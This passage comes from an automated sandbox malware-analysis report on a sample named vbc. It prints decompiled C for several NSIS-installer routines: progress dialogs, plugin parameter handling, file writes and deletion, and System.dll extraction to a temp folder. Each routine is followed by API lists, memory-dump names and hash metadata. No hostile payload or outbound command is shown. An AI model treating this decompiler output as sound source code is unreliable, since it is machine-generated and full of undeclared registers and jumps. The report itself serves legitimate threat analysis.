				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404c49
0x00404c56
0x00404c5c
0x00404c9a
0x00404c9a
0x00404ca9
0x00404cb0
0x00000000
0x00404cb2
0x00404c5e
0x00404c6d
0x00404c75
0x00404c78
0x00404c8a
0x00404c90
0x00404c97
0x00000000
0x00404c97
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C56
GetMessagePos.USER32 ref: 00404C5E
ScreenToClient.USER32(?,?), ref: 00404C78
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C8A
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404CB0

Strings

f, xrefs: 00404C8C

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
Instruction ID: 3ec40d72beee944c7b32a6f5f5203a90e51618c2e0ef94a62ef03edc632050ca
Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
Instruction Fuzzy Hash: 88015271901218BAEB10DF94DD45FFEBBBCAF58711F10012BBA51B61C0C7B499018B95

Uniqueness

Uniqueness Score: -1.00%

Function 00402D98 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402D98(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E17();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a250 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402da8
0x00402db6
0x00402dbc
0x00402dbc
0x00402dca
0x00402dcc
0x00402dd8
0x00402ddd
0x00402ddf
0x00402ddf
0x00402dea
0x00402dfa
0x00402e0c
0x00402e0c
0x00402e14

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DB6
wsprintfW.USER32 ref: 00402DEA
SetWindowTextW.USER32 ref: 00402DFA
SetDlgItemTextW.USER32 ref: 00402E0C

Strings

unpacking data: %d%%, xrefs: 00402DD8
verifying installer: %d%%, xrefs: 00402DDF, 00402DE8

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
Instruction ID: 5b31381c318dcc107e486aeb82f0cbc8ffe93b2faae57e60c2f54a212ea49e40
Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
Instruction Fuzzy Hash: 53F0367154020CABDF245F50DD49BEA3B69FB44304F00803AFA05B51D0DBB959658B99

Uniqueness

Uniqueness Score: -1.00%

Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100022D0(void* __edx) {
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t42;
				signed int* _t43;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t42 = 0x1a;
					if(_t52 == _t42) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t42;
							goto L12;
						} else {
							_t38 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t38 = E10001243();
						L11:
						_t52 = _t38;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t43 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t39 =  *_t51;
						_t51[7] = _t51[7] & 0x00000000;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t40;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M1000244C))) {
								case 0:
									 *_t43 =  *_t43 & 0x00000000;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if(lstrlenW(__ebp) > 0) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E1000122C(0x10004044);
					goto L10;
				}
			}

0x100022e4
0x100022e8
0x100022f3
0x100022f3
0x100022fa
0x100022ff
0x00000000
0x00000000
0x10002303
0x10002306
0x00000000
0x00000000
0x1000230b
0x10002316
0x10002326
0x00000000
0x1000231d
0x1000231f
0x10002335
0x00000000
0x10002335
0x1000230d
0x1000230d
0x10002336
0x10002336
0x10002338
0x1000233c
0x1000233c
0x1000233f
0x1000233f
0x10002347
0x10002349
0x10002350
0x10002415
0x10002416
0x10002421
0x1000244b
0x1000244b
0x10002431
0x1000243d
0x10002433
0x10002433
0x10002433
0x00000000
0x10002356
0x10002356
0x00000000
0x1000235d
0x00000000
0x00000000
0x10002366
0x00000000
0x00000000
0x10002374
0x10002376
0x00000000
0x00000000
0x10002397
0x1000239d
0x100023a0
0x100023a2
0x100023b2
0x00000000
0x00000000
0x1000237f
0x10002384
0x10002387
0x10002388
0x00000000
0x00000000
0x100023be
0x100023c4
0x100023c5
0x100023c8
0x100023c9
0x100023cb
0x00000000
0x00000000
0x100023dc
0x100023df
0x100023eb
0x100023ed
0x00000000
0x00000000
0x100023f9
0x10002405
0x10002408
0x1000240a
0x1000240d
0x00000000
0x00000000
0x10002356
0x10002350
0x1000232b
0x10002330
0x00000000
0x10002330

APIs

GlobalFree.KERNEL32(00000000), ref: 10002416

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_vbc.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61

Uniqueness

Uniqueness Score: -1.00%

Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100024A9(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B9))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}

0x100024b3
0x100024b5
0x100024c4
0x100024ca
0x100024d7
0x100024d9
0x100024dd
0x100024dd
0x100024e5
0x100024eb
0x100024ed
0x00000000
0x100024f4
0x00000000
0x00000000
0x100024fa
0x00000000
0x00000000
0x10002504
0x00000000
0x00000000
0x1000250b
0x10002511
0x1000251d
0x10002523
0x10002528
0x00000000
0x00000000
0x1000254a
0x00000000
0x00000000
0x10002530
0x10002536
0x10002537
0x10002539
0x00000000
0x00000000
0x10002552
0x10002554
0x10002556
0x10002558
0x10002558
0x00000000
0x00000000
0x100024ed
0x1000255b
0x1000255b
0x10002560
0x10002572
0x10002572
0x10002578
0x1000257d
0x10002582
0x1000258e
0x10002593
0x00000000
0x10002598
0x10002584
0x10002585
0x10002599
0x10002599
0x10002582
0x1000259a
0x1000259e
0x100025a1
0x100025b8

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 10002572
GlobalFree.KERNEL32(00000000), ref: 100025AD

Memory Dump Source

Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_vbc.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004028C3 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004028C3(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C53(0xfffffff0);
				 *(_t56 - 0x40) = _t23;
				if(E00405C3D(_t50) == 0) {
					E00402C53(0xffffffed);
				}
				E00405DC2(_t50);
				_t26 = E00405DE7(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a254;
					 *(_t56 - 0x38) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403402(_t45);
						E004033EC(_t49,  *(_t56 - 0x38));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x50) = _t54;
						if(_t54 != _t45) {
							E0040317B(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405DA2( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x50));
						}
						E00405E99( *(_t56 + 8), _t49,  *(_t56 - 0x38));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x30)) = E0040317B(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x40));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004028c3
0x004028c5
0x004028d1
0x004028d4
0x004028de
0x004028e2
0x004028e2
0x004028e8
0x004028f5
0x004028fd
0x00402900
0x00402906
0x00402914
0x00402919
0x0040291d
0x00402920
0x00402929
0x00402935
0x00402939
0x0040293c
0x00402946
0x00402965
0x0040294d
0x00402952
0x0040295a
0x0040295d
0x00402962
0x00402962
0x0040296c
0x0040296c
0x00402979
0x0040297f
0x00402991
0x00402991
0x00402997
0x00402997
0x004029a2
0x004029a3
0x004029a7
0x004029ab
0x004029b1
0x004029b1
0x004029b8
0x0040224b
0x00402ade
0x00402aea

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402917
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402933
GlobalFree.KERNEL32(?), ref: 0040296C
GlobalFree.KERNEL32(00000000), ref: 0040297F
CloseHandle.KERNEL32(?), ref: 00402997
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 004029AB

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
Instruction ID: 8996c306b55a9cd0cf00445349fd93af405541c9de08eca1dd931963291c836b
Opcode Fuzzy Hash: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
Instruction Fuzzy Hash: C221BF71800124BBDF116FA5CE49D9E7E79EF09364F10423EF8507A2E0CB794D418B98

Uniqueness

Uniqueness Score: -1.00%

Function 00404B2D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404B2D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406234(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406234(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406234(_t44, _t50, 0x423728, 0x423728, _a8);
				wsprintfW(_t34 + lstrlenW(0x423728) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429218, _a4, 0x423728);
			}

0x00404b36
0x00404b3b
0x00404b43
0x00404b44
0x00404b51
0x00404b59
0x00404b5a
0x00404b5c
0x00404b5e
0x00404b60
0x00404b63
0x00404b63
0x00404b6a
0x00404b70
0x00404b70
0x00404b77
0x00404b7e
0x00404b81
0x00404b84
0x00404b84
0x00404b88
0x00404b98
0x00404b9a
0x00404b9d
0x00404b46
0x00404b46
0x00404b4d
0x00404b4d
0x00404ba5
0x00404bb0
0x00404bc6
0x00404bd7
0x00404bf3

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
wsprintfW.USER32 ref: 00404BD7
SetDlgItemTextW.USER32 ref: 00404BEA

Strings

%u.%u%s%s, xrefs: 00404BB8
(7B, xrefs: 00404BC0

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
Instruction ID: 06844f863ebb5207f96fa0dde493c575b08da8a3ff5d6269356cbccd3d727cca
Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
Instruction Fuzzy Hash: E211D873A0412877DB00666D9C41F9E32989B85374F150237FA25F31D1DA79D81282E9

Uniqueness

Uniqueness Score: -1.00%

Function 004025AE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004025AE(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x50) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C53(0x11)) + _t16;
					} else {
						E00402C53(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp", 0xffffffff, "C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp\System.dll", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp\System.dll");
					}
				} else {
					E00402C31(1);
					 *0x40add8 = __ax;
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E00406172(_t27, _t32);
					if((_t29 |  *(_t35 - 0x50)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405EC8(_t34, _t34) >= 0) {
						_t14 = E00405E99(_t34, "C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp\System.dll",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x004025ae
0x004025ae
0x004025ae
0x004025b3
0x004025b6
0x004025b9
0x004025be
0x004025c0
0x004025e0
0x0040261e
0x004025e2
0x004025e4
0x004025fe
0x00402609
0x00402609
0x004025c2
0x004025c4
0x004025c9
0x004025d7
0x004025da
0x00402623
0x00402626
0x004028a1
0x004028a1
0x0040262c
0x00402635
0x00402637
0x00402656
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x00402637
0x00402ade
0x00402aea

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsp5B93.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll,00000400,?,?,00000021), ref: 004025FE
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsp5B93.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll,00000400,?,?,00000021), ref: 00402609

Strings

C:\Users\user\AppData\Local\Temp\nsp5B93.tmp, xrefs: 004025F7
C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll, xrefs: 004025C9, 004025F0, 00402604, 00402650

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsp5B93.tmp$C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll
API String ID: 3109718747-2985964299
Opcode ID: d2c789987130d99a9d8555b995c4ef7a99902a466d6c51683c5913d45da2c776
Instruction ID: 0226f840347654c2ecdc96a32175c32971a63fe26a5c545fd31e5d705646dbf5
Opcode Fuzzy Hash: d2c789987130d99a9d8555b995c4ef7a99902a466d6c51683c5913d45da2c776
Instruction Fuzzy Hash: CE11C872A05714BADB106BB18E8999E7765AF00359F20453FF102F61C1DAFC8982575E

Uniqueness

Uniqueness Score: -1.00%

Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189
COMMON

